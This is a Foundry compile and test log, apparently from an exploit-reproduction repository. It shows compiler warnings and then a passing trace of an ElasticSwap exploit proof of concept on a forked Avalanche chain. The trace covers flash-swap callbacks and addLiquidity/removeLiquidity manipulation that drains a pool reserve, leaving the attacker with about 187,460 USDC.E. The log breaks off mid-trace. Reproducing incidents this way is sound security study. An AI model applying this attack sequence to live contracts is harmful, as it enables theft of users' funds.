Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:70:28:
   |
70 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                            ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:70:44:
   |
70 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                            ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:70:61:
   |
70 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                             ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:70:78:
   |
70 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                              ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:75:22:
   |
75 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:75:39:
   |
75 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                       ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:75:57:
   |
75 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/ElasticSwap_exp.sol:75:75:
   |
75 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                           ^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 527.72ms (1.73ms CPU time)

Ran 1 test for src/test/2022-12/ElasticSwap_exp.sol:ContractTest
[PASS] testExploit() (gas: 604261)
Logs:
  Attacker USDC.E balance after exploit: 187460.625848
  Attacker TIC balance after exploit: 40607.382031668692420301

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("Avalanche", 23563709 [2.356e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [695961] ContractTest::testExploit()
    ├─ [24588] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::approve(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xa3fb1b9ca6ea8826cd21d273295d0c33641a3c2fb4aebaeb190f8a7601403f44: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [25272] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::approve(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24616] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::approve(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [587478] 0x4CF9dC05c715812FeAD782DC98de0168029e05C8::swap(51112000000000000000000 [5.111e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29870] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 51112000000000000000000 [5.111e22])
    │   │   ├─ emit Transfer(from: 0x4CF9dC05c715812FeAD782DC98de0168029e05C8, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 51112000000000000000000 [5.111e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x7577a4ef65a4afd59ac11d8d86b4b0e83aa7148d1f036c8c960cf4c05a4d74ec: 0x000000000000000000000000000000000000000000000ad2cf0745c489fd533a → 0x0000000000000000000000000000000000000000000000000589b8bff45d533a
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000ad2c97d8d0495a00000
    │   │   └─ ← [Return] true
    │   ├─ [519884] ContractTest::uniswapV2Call(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 51112000000000000000000 [5.111e22], 0, 0x00)
    │   │   ├─ [508169] 0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1::swap(766685000000 [7.666e11], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   │   │   ├─ [30847] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 766685000000 [7.666e11])
    │   │   │   │   ├─ emit Transfer(from: 0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 766685000000 [7.666e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4d1a5c3e94682e32651f2d47f09364b017346de5c260f4ba39fc946f6cb1cd91: 0x000000000000000000000000000000000000000000000000000001b7d5509670 → 0x000000000000000000000000000000000000000000000000000001055353e530
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000000b281fcb140
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [437188] ContractTest::joeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 766685000000 [7.666e11], 0, 0x00)
    │   │   │   │   ├─ [2581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 41532645399984141510552 [4.153e22]
    │   │   │   │   ├─ [2886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 196885131508 [1.968e11]
    │   │   │   │   ├─ [89970] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::addLiquidity(1000000000 [1e9], 0, 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000 [1e12])
    │   │   │   │   │   ├─ [2327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4412737069511284 [4.412e15]
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 41532645399984141510552 [4.153e22]
    │   │   │   │   │   ├─ [44006] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::faf5c6ed(000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008cb7d3d6de63c3c2798000000000000000000000000000000000000000000000000000fad5c6983f2740000000000000000000000000000000000000000000000000000000000000006) [delegatecall]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000008cb7d3d6de63c3c2798 → 0x0000000000000000000000000000000000000000000008cb7d3d6de677d6f198
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f738266ef
    │   │   │   │   │   ├─ [2341] 0x8B3D780Db8842593d8b61632A2F76c4D4f31D7C3::feeAddress() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008aa16c21a8b529a655711c62bdef27456b1e8fe3
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x8AA16c21a8b529a655711c62BdEf27456b1E8Fe3, value: 66362435311 [6.636e10])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   │   ├─ [6382] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 1000000000 [1e9])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 1000000000 [1e9])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x0000000000000000000000000000000000000000000008cb7d3d6de63c3c2798 → 0x0000000000000000000000000000000000000000000008cb7d3d6de677d6f198
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000ad2c97d8d0495a00000 → 0x000000000000000000000000000000000000000000000ad2c97d8d045a053600
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit AddLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1000000000 [1e9], param2: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000000000fad5c6983f274 → 0x000000000000000000000000000000000000000000000000000fad6bdd065963
    │   │   │   │   │   │   @ 8: 0x000000000000000000000000000000000001932410b87baca5042650bfc68796 → 0x000000000000000000000000000000000001932a461c752e6ac103c4d356c4e0
    │   │   │   │   │   │   @ 0x7b55e6202e2a418dbde9e7e2a8077e8eb7f40f5a03a0b897992123f7edb7c787: 0x000000000000000000000000000000000000000000000000000001c53f41e649 → 0x000000000000000000000000000000000000000000000000000001d4b2c44d38
    │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000008cb7d3d6de63c3c2798 → 0x0000000000000000000000000000000000000000000008cb7d3d6de677d6f198
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [85686] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::addLiquidity(41532645399984141510552 [4.153e22], 196885131508 [1.968e11], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000 [1e12])
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4412803431946595 [4.412e15]
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 41532645399985141510552 [4.153e22]
    │   │   │   │   │   ├─ [37676] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::faf5c6ed(0000000000000000000000000000000000000000000008cb7d3d6de63c3c27980000000000000000000000000000000000000000000000000000002dd744b0f4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008cb7d3d6de677d6f198000000000000000000000000000000000000000000000000000fad6bdd0659630000000000000000000000000000000000000000000000000000000000000006) [delegatecall]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000008cb7d3d6de677d6f198 → 0x000000000000000000000000000000000000000000001196fa7adbccb4131930
    │   │   │   │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000000002dd744b0f4 → 0x0000000000000000000000000000000000000000000000000000005bae8961e7
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000008cb7d3d6de63c3c27980000000000000000000000000000000000000000000000000000002dd744b0f3000000000000000000000000000000000000000000000000000fad6bdd0601d50000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4412803431924181 [4.412e15])
    │   │   │   │   │   ├─ [3582] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 41532645399984141510552 [4.153e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 41532645399984141510552 [4.153e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x0000000000000000000000000000000000000000000008cb7d3d6de677d6f198 → 0x000000000000000000000000000000000000000000001196fa7adbccb4131930
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000ad2c97d8d045a053600 → 0x0000000000000000000000000000000000000000000002074c401f1e1dc90e68
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [10137] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 196885131507 [1.968e11])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 196885131507 [1.968e11])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007716244508428 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000002dd744b0f4 → 0x0000000000000000000000000000000000000000000000000000005bae8961e7
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000000000000b281fcb140 → 0x00000000000000000000000000000000000000000000000000000084aab8004d
    │   │   │   │   │   │   │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd228bb4f0c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit AddLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 41532645399984141510552 [4.153e22], param2: 196885131507 [1.968e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000000000fad6bdd065963 → 0x000000000000000000000000000000000000000000000000001f5ad7ba0c5b38
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000fad6bdd0601d5
    │   │   │   │   │   │   @ 8: 0x000000000000000000000000000000000001932a461c752e6ac103c4d356c4e0 → 0x0000000000000000000000000000000000064ca91871c30d57e03358d476ea50
    │   │   │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000000002dd744b0f4 → 0x0000000000000000000000000000000000000000000000000000005bae8961e7
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 393770263015 [3.937e11]
    │   │   │   │   ├─ [4147] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transfer(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 393770263015 [3.937e11])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 393770263015 [3.937e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000005bae8961e7 → 0x000000000000000000000000000000000000000000000000000000b75d12c3ce
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000084aab8004d → 0x00000000000000000000000000000000000000000000000000000028fc2e9e66
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [599] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4412803431924181 [4.412e15]
    │   │   │   │   ├─ [56322] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::removeLiquidity(4412803431924181 [4.412e15], 1, 1, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000 [1e12])
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 8825606863870776 [8.825e15]
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 83065290799969283021104 [8.306e22]
    │   │   │   │   │   ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 787540526030 [7.875e11]
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 8825606863870776 [8.825e15]
    │   │   │   │   │   ├─ [31653] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::6cb4024b(000000000000000000000000000000000000000000000000001f5ad7ba0c5b38000000000000000000000000000000000000000000001196fa7adbccb41319300000000000000000000000000000000000000000000000000000005bae8961e70000000000000000000000000000000000064ca91871c30d57e03358d476ea50) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 4412803431924181 [4.412e15])
    │   │   │   │   │   ├─ [3170] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 41532645399879162903997 [4.153e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 41532645399879162903997 [4.153e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000002074c401f1e1dc90e68 → 0x000000000000000000000000000000000000000000000ad2c97d8cebe8cecc25
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x000000000000000000000000000000000000000000001196fa7adbccb4131930 → 0x0000000000000000000000000000000000000000000008cb7d3d6dfee90d5b73
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [4147] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 393770263013 [3.937e11])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 393770263013 [3.937e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000028fc2e9e66 → 0x00000000000000000000000000000000000000000000000000000084aab8004b
    │   │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x000000000000000000000000000000000000000000000000000000b75d12c3ce → 0x0000000000000000000000000000000000000000000000000000005bae8961e9
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit RemoveLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 41532645399879162903997 [4.153e22], param2: 393770263013 [3.937e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000000000fad6bdd0601d5 → 0
    │   │   │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000000005bae8961e7 → 2
    │   │   │   │   │   │   @ 6: 0x000000000000000000000000000000000000000000001196fa7adbccb4131930 → 0x0000000000000000000000000000000000000000000008cb7d3d6dfee90d5b73
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000000001f5ad7ba0c5b38 → 0x000000000000000000000000000000000000000000000000000fad6bdd065963
    │   │   │   │   │   │   @ 8: 0x0000000000000000000000000000000000064ca91871c30d57e03358d476ea50 → 0x000000000000000000000000000000000000000000001196fa7adbfdd21ab6e6
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [619] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::internalBalances() [staticcall]
    │   │   │   │   │   └─ ← [Return] InternalBalances({ baseTokenReserveQty: 41532645400090120117107 [4.153e22], quoteTokenReserveQty: 2, kLast: 83065290800180240234214 [8.306e22] })
    │   │   │   │   ├─ [23224] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::swapQuoteTokenForBaseToken(200, 1, 1000000000000 [1e12])
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 41532645400090120117107 [4.153e22]
    │   │   │   │   │   ├─ [2083] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::c131f417(00000000000000000000000000000000000000000000000000000000000000c800000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000008cb7d3d6dfee90d5b7300000000000000000000000000000000000000000000000000000000000000320000000000000000000000000000000000000000000000000000000000000006) [delegatecall]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000008cb7d3d6dfee90d5b73 → 0x0000000000000000000000000000000000000000000000166722ffd2236ef05b
    │   │   │   │   │   │   │   @ 7: 2 → 202
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000008b5161a6e2cc59e6b18
    │   │   │   │   │   ├─ [7337] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 200)
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 200)
